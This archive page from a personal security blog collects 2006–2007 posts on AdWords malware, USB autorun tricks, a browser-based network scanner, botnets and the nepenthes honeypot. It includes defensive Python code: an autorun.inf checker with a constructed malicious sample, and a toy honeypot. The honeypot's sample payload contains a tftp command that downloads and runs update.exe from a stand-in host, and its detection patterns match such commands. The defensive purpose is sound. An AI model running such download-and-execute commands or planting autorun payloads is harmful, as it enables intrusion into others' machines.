Archive for the ‘Spyware’ Category

0wned by Google AdWords

Wednesday, May 2nd, 2007

Personally, I have an AdBlock entry that blocks Google AdWords and a lot of other advertising sites. I know that by displaying ads, you’re opening yourself up to HTML, JavaScript, and any other nastiness that doesn’t originate from the site you’re trying to visit. I also don’t click on those paid advertising links from a Google search because usually they’re for a commercial product when all I need are simple instructions.

Here are two sites by people who have personally run into malware served through Google AdWords sponsored links.

http://www.dynamoo.com/blog/2007/04/malware-via-adwords.html
http://explabs.blogspot.com/2007/04/google-sponsored-links-not-safe.html

Windows: Protecting your system from malware

Thursday, April 19th, 2007

I use this link often when setting up new computers or helping a friend or family member secure theirs. Since I’m always searching for this site, I decided to mirror a copy of it here.

If someone knows of a better suite of tools please let me know.

So how did I get infected in the first place?
http://www.castlecops.com/postlite7736-.html


P0wned by a QT movie

Monday, March 12th, 2007

This is from another one of my favorite blogs: Didier Stevens.

I found this entry enjoyable because it’s yet another one of those “Owned by MySpace” posts. It’s also really well written and very easy to follow (even for a newcomer).

Here’s a link to the blog entry:
http://didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/

Embedding JavaScript inside a QuickTime movie is nothing new; GNUCitizen discussed it back in September. But it’s good to actually see it in the wild.

How to completely own someone with a USB key

Friday, November 3rd, 2006

I ran across a few articles yesterday while doing some catching up on old blogs I haven’t read in a while.

Everyone probably knows that many new USB keys ship with a U3 partition (a small read-only partition that presents itself to Windows as a CD-ROM, which is why Windows will autorun it). And I’m also sure that everyone knows you can hack that U3 partition to automatically install and run whatever software you want (trojans, spyware, a tool that pulls the SAM database and emails it somewhere, etc.).

However, did you know you can do the same thing with an old non-U3 USB key? It works roughly the same way. You create an autorun.inf file and put it in the root of the key. When the key is inserted into a Windows XP SP2 machine, Windows pops up the standard AutoPlay dialog (“What do you want Windows to do?”). The autorun.inf file can define a custom action with a custom icon, and that action is listed at the top of the dialog, so a user who just clicks the first entry runs whatever the file points at.
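Here is what that autorun.inf trick looks like from the defender’s side, as an added example written for this page (it is not code from the original post or from the articles it links). The script parses the [autorun] section of an autorun.inf and flags the two things the post describes: a launch key (open, shellexecute, shell\…\command) pointing at an executable, and an action/icon pair dressed up to look like the dialog’s own “open folder” choice. The two sample files, their file names and the icon index are made up for the example.

```python
"""Inspect an autorun.inf for the custom-action trick described in the post.

Added example, not the post's own code. Parses the [autorun] section and
flags launch keys that run an executable plus an action/icon pair that
mimics the Windows XP AutoPlay dialog's built-in "open folder" entry.
"""
import os
import shlex

# Constructed sample (hypothetical): what a booby-trapped non-U3 key might carry.
MALICIOUS_AUTORUN_INF = """\
; autorun.inf
[autorun]
open=setup\\update.exe /s
icon=%SystemRoot%\\system32\\shell32.dll,4
action=Open folder to view files
label=Holiday photos
shell\\open\\command=setup\\update.exe /s
"""

# Constructed sample: the harmless kind a vendor ships (icon and label only).
BENIGN_AUTORUN_INF = """\
[autorun]
icon=vendor.ico
label=Vendor USB Drive
"""

# Extensions Windows runs directly when named in open=/shellexecute=.
EXECUTABLE_EXT = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js", ".hta", ".msi"}
# Text of the choice the XP SP2 AutoPlay dialog offers on its own; copying it
# makes the attacker's entry look like the safe one.
BUILTIN_ACTION_TEXTS = {"open folder to view files"}


def parse_autorun(text):
    """Return {key: value} for the [autorun] section; keys lower-cased, later duplicates win.

    Hand-rolled rather than configparser so '%SystemRoot%' and backslashes in
    keys pass through untouched and a malformed file never raises.
    """
    entries = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_keys(entries):
    """Keys whose value Windows may execute: open, shellexecute, shell\\<verb>\\command."""
    keys = [k for k in ("open", "shellexecute") if k in entries]
    keys += [k for k in entries if k.startswith("shell\\") and k.endswith("\\command")]
    return keys


def program_of(command):
    """First token of a command line with surrounding quotes removed."""
    tokens = shlex.split(command, posix=False)  # posix=False keeps backslashes literal
    return tokens[0].strip('"') if tokens else ""


def assess(entries):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    for key in launch_keys(entries):
        program = program_of(entries[key])
        if os.path.splitext(program.lower())[1] in EXECUTABLE_EXT:
            findings.append(f"{key} runs an executable from the key: {entries[key]}")
    action = entries.get("action", "").strip().lower()
    if action in BUILTIN_ACTION_TEXTS:
        findings.append(f"action text mimics the built-in AutoPlay choice: {entries['action']!r}")
    icon = entries.get("icon", "").lower()
    if "shell32.dll" in icon and launch_keys(entries):
        findings.append(f"icon borrows a system icon so the entry looks native: {entries['icon']}")
    return findings


def scan_drive_root(path):
    """Check <path>\\autorun.inf on a mounted key; None when the file is absent."""
    inf = os.path.join(path, "autorun.inf")
    if not os.path.isfile(inf):
        return None
    with open(inf, encoding="latin-1", errors="replace") as fh:
        return assess(parse_autorun(fh.read()))


if __name__ == "__main__":
    for name, text in (("malicious", MALICIOUS_AUTORUN_INF), ("benign", BENIGN_AUTORUN_INF)):
        print(name, assess(parse_autorun(text)) or ["nothing suspicious"])
```

Point it at a mounted key with scan_drive_root(r"E:\"). The real fix on XP is to stop Windows from honoring the file at all: set the NoDriveTypeAutoRun value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer to 0xFF, which disables AutoPlay for every drive type.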


SPI Dynamics JavaScript Network Scanner

Tuesday, August 1st, 2006

I just read an article on Richard Bejtlich’s blog about some proof-of-concept code that SPI Dynamics has released. The application is written in JavaScript and runs in a web browser. It shows how JavaScript served by a web page can scan the visitor’s local network for live devices and even determine which services are running on the hosts it finds. This is an extremely cool concept.

I suggest you read the whitepaper and give the proof of concept a try. It is quite impressive. I tried the proof of concept on my home network and was amazed as the web page continued to update, displaying live hosts on the network and whether the hosts were running a web server or not. It scanned my HP 2550 Color LaserJet printer and showed the IP to be active and that there was a web server running on it, although it couldn’t identify the server software correctly. It currently will only identify IIS and Apache web servers correctly. There is also a list of known issues posted on their site.

I can see how this could get ugly real fast. The next web site you entertain could have something similar running behind the scenes and may not be so polite as to update the web page you are viewing with the activities it is performing unbeknownst to you. If this type of scanner were to grow over time, there could be ways to determine vulnerabilities within the services found on the host and then determine ways to exploit them. All of this can happen while you peruse the web behind the comfort and security of your firewall… Interesting!

Advanced VIM tutorial

Sunday, May 21st, 2006

If you’re a UNIX / Linux guy and use vi or vim on a regular basis, this tutorial is for you. There’s no way for one person to know all, or in my case a quarter, of what vi/vim has to offer. I’m ALWAYS learning new things.

This tutorial will definitely show you things you didn’t know about vim.

The author of this tutorial brings up a good point: why take the time to learn a more efficient way to do the task at hand when researching that more efficient way would take longer than just doing the task? Because the next time you’re faced with the task, you’ll still be stuck doing it the long way. Besides, how else are you going to learn all the cool features of your favorite text editor?

Also, remember this is an advanced tutorial. As the author states, “In this tutorial I assume the reader to have a basic knowledge of vim. Basic features like editing, movement, searching, replacing, opening, saving etc not covered in this tutorial. I’d recommend going through vimtutor for basic understanding of vim.”

Make sure you read the comments since they also contain good pointers and one guy points us to two more great vim resources:
http://www.rayninfo.co.uk/vimtips.html
http://www.moolenaar.net/habits.html

Now on to the tutorial: http://blog.smr.co.in/cgi-bin/index.cgi/blogs/linux/1143567189.html

Really good article on botnets

Saturday, May 20th, 2006

This is a great, and long, story about a student at Auburn University who clicked on a link in an email. Of course, clicking on a link in an email isn’t always a bad thing, unless the web server you’re visiting installs malicious code on your PC!

Even if you’re not interested in botnets or computer security, this is a good read. It’s very informative and offers a glance into the lives of these “bot masters”.

Think you’re safe because your internal network is NAT’d behind a corporate proxy? Think you’re safe because your firewall rules are tight? Think you’re safe because you patch every computer on your network the second Tuesday of every month?

Think again.

http://www.baselinemag.com/article2/0,1540,1946404,00.asp

Collecting malware while you browse

Friday, April 7th, 2006

This is an awesome idea! These guys wrote a program that listens on the network for incoming malware attacks. Once it detects an attack, it emulates the vulnerable service’s responses well enough that the attacker hands over its payload, and it logs all communications. That’s just cool.

I learned about the tool from Richard Bejtlich’s blog, TaoSecurity. It’s called nepenthes and you can download it from http://nepenthes.mwcollect.org/
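To make the “emulate a response and log everything” idea concrete, here is an added example written for this page. It is not nepenthes code and it emulates far less than nepenthes does: it accepts a connection on a port worms probe, returns a fixed banner (an assumption; nepenthes emulates specific vulnerabilities), records whatever the attacker sends, and pulls download URLs and shell commands out of the payload, which is the part of the exchange you actually want to keep. The ports, banners and sample payload are constructed for the example.

```python
"""Minimal low-interaction malware collector (added example, not nepenthes code).

nepenthes emulates specific known vulnerabilities; this toy only accepts a
connection, sends a fixed banner so the attacker keeps talking, records what
it sent, and extracts download URLs and shell commands from the payload.
Ports, banners and the sample payload below are assumptions for the example.
"""
import json
import re
import socket
import time

# Banner per emulated port (illustrative; nepenthes speaks the real protocols).
BANNERS = {
    21: b"220 FTP server ready\r\n",
    25: b"220 mail ESMTP ready\r\n",
    80: b"HTTP/1.0 200 OK\r\nServer: Apache\r\n\r\n",
}

# Indicators worth keeping from a captured payload: where the malware is
# fetched from, and the command line the shellcode tries to run.
URL_RE = re.compile(rb"(?:https?|ftp|tftp)://[\x21-\x7e]+", re.IGNORECASE)
CMD_RE = re.compile(
    rb"(?:tftp\s+-i\s+\S+\s+get\s+\S+|cmd(?:\.exe)?\s*/c\s+[^\x00\r\n]+)",
    re.IGNORECASE,
)

# Constructed sample payload: NOP sled, a tftp download command, then a URL.
SAMPLE_PAYLOAD = (
    b"\x90" * 16
    + b"cmd /c tftp -i 192.0.2.10 get update.exe & update.exe\x00"
    + b"http://192.0.2.10/update.exe\x00"
)


def extract_indicators(payload):
    """Return {'urls': [...], 'commands': [...]} found in raw bytes, de-duplicated."""
    urls = sorted({m.decode("latin-1") for m in URL_RE.findall(payload)})
    cmds = sorted({m.decode("latin-1") for m in CMD_RE.findall(payload)})
    return {"urls": urls, "commands": cmds}


def make_record(peer, port, payload):
    """One log entry per connection: who, which port, how much, a head hexdump, indicators."""
    rec = {
        "time": time.time(),
        "peer": peer,
        "port": port,
        "bytes": len(payload),
        "head_hex": payload[:64].hex(),
    }
    rec.update(extract_indicators(payload))
    return rec


def handle(conn, peer, port, max_bytes=65536, idle=5.0):
    """Send the banner, read until the attacker goes quiet, return the record."""
    conn.settimeout(idle)
    chunks, total = [], 0
    try:
        conn.sendall(BANNERS.get(port, b""))
        while total < max_bytes:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
            total += len(data)
    except OSError:
        pass  # timeout or dropped connection; keep what we already have
    finally:
        conn.close()
    return make_record(peer, port, b"".join(chunks))


def serve(port, bind="0.0.0.0", log=print, max_conns=None):
    """Listen on one port and log each connection as a JSON line."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(5)
    seen = 0
    try:
        while max_conns is None or seen < max_conns:
            conn, (ip, _) = srv.accept()
            log(json.dumps(handle(conn, ip, port)))
            seen += 1
    finally:
        srv.close()


if __name__ == "__main__":
    # Offline demonstration on the constructed payload; real use is serve(21),
    # serve(25), ... on a throwaway box (ports below 1024 need root).
    print(json.dumps(make_record("198.51.100.7", 445, SAMPLE_PAYLOAD), indent=2))
```

The banner is the weak point of this toy: a worm that checks for a specific vulnerable service will not get far past it, which is exactly why nepenthes goes to the trouble of emulating the real vulnerabilities. The record format, on the other hand, is the useful bit to keep: peer, port, size, the first bytes, and the URLs and commands the payload carried.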

One thing I really like about Richard Bejtlich’s blog posts is that he’s very thorough. You can read about his experience installing and using nepenthes at the following URLs:

http://taosecurity.blogspot.com/2006/01/nepenthes-discoveries-earlier-today-i.html
http://taosecurity.blogspot.com/2006/01/nepenthes-installation-ive-been.html

This tool comes prepackaged for all the cool distros: Gentoo, Debian, and FreeBSD, but of course the source is also provided along with instructions for getting it compiled and running on Windows.

You can find the README at http://nepenthes.mwcollect.org/documentation:readme.